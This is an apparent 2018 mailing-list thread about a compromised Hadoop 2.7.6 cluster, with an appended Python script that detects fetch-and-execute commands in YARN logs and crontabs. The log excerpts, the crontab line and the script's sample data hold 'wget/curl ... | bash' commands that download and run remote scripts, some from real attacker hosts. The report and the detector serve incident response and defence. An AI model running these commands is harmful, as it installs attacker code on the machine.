Hi Sandeep,

Short answer to your question: yes, unfortunately.

Kind regards,
Cliff Mattern



On 05.07.2018 at 21:14, Sandeep Nemuri wrote:
Is this cluster open to the internet? We've seen a few clusters which are open to the internet affected by this attack.

On Thu, Jul 5, 2018 at 8:32 PM Cliff Mattern <[email protected]> wrote:

    Dear all,

    we downloaded
    http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz
    and installed the unpacked files as described. The md5 check was
    correct. After a few days we found the following entries in the
    YARN log files:

        2018-06-29 05:37:21,490 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1530169168373_1580_01_000001 : wget -q -O - https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash
        ...
        2018-06-29 05:39:54,152 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1530169168373_1583_01_000001 : wget -q -O - https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash & disown

    In the crontab we found the following single entry:

        * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1

    We installed hadoop 2.7.6 on two separate machines and get the
    same behaviour. This all looks like a trojan is working.
    What do you say to this issue?

    Kind regards,
    Cliff Mattern

    --
    Clifford Mattern
    AlphaCarina Software GmbH
    Taunusturm 18.OG
    Taunustor 1
    60310 Frankfurt am Main

    Tel.: +49 (0)69 24 43 42-4395
    Fax: +49 (0)69 24 43 42-4150

    e-Mail: [email protected]
    Internet:https://alphacarina.de/

    HRB No. 2339 • Commercial Register Deggendorf
    Managing Director: Dipl.-Inf. Stephan Iglhaut



--
*  Regards*
*  Sandeep Nemuri*
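
Added example, not part of the original thread and not Hadoop project code: a Python check that scans ResourceManager log lines for AMLauncher entries of the kind quoted above, where the launch command pipes a download into a shell, maps each container ID to its application ID, and applies the same test to crontab lines. The sample lines, the host example.invalid and the address 192.0.2.10 are constructed; the regexes assume the log format shown in the message.

```python
import re

# AMLauncher entry layout as quoted in the message above (assumed stable).
LAUNCH_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \S+ "
    r"\S*AMLauncher: Command to launch container "
    r"container_(?:e\d+_)?(?P<cluster_ts>\d+)_(?P<app>\d+)_\d+_\d+"
    r"\s*:\s*(?P<cmd>.*)$"
)
# A download tool whose output is piped straight into a shell.
FETCH_PIPE_RE = re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:/\S*/)?(?:ba|da|z|k)?sh\b")

def suspicious_launches(lines):
    """Return (timestamp, application id, command) for fetch-and-execute AM launches."""
    hits = []
    for line in lines:
        m = LAUNCH_RE.match(line.strip())
        if m and FETCH_PIPE_RE.search(m["cmd"]):
            # container_<clusterTs>_<appNo>_... belongs to application_<clusterTs>_<appNo>
            hits.append((m["ts"], f"application_{m['cluster_ts']}_{m['app']}", m["cmd"]))
    return hits

def suspicious_cron(lines):
    """Return non-comment crontab entries whose command fetches and executes."""
    return [l.strip() for l in lines
            if not l.lstrip().startswith("#") and FETCH_PIPE_RE.search(l)]

# Constructed sample input (not taken from a real cluster).
_P = ("INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: "
      "Command to launch container ")
SAMPLE_RM_LOG = [
    "2018-01-01 00:00:01,000 " + _P + "container_1500000000000_0007_01_000001 : "
    "wget -q -O - https://example.invalid/a.sh | bash & disown",
    "2018-01-01 00:00:02,000 " + _P + "container_1500000000000_0008_01_000001 : "
    "/usr/bin/java -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster",
    "2018-01-01 00:00:03,000 " + _P + "container_e17_1500000000000_0009_01_000001 : "
    "curl -s http://192.0.2.10/c.sh | sh",
]
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "* * * * * wget -q -O - http://192.0.2.10/c.sh | sh > /dev/null 2>&1",
    "0 3 * * * /usr/local/bin/backup.sh",
]

if __name__ == "__main__":
    for ts, app_id, cmd in suspicious_launches(SAMPLE_RM_LOG):
        print(f"{ts}  {app_id}  {cmd}")
    for entry in suspicious_cron(SAMPLE_CRONTAB):
        print("crontab:", entry)
```

The application IDs it reports can be passed to `yarn application -status` to see which user and queue submitted each job.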
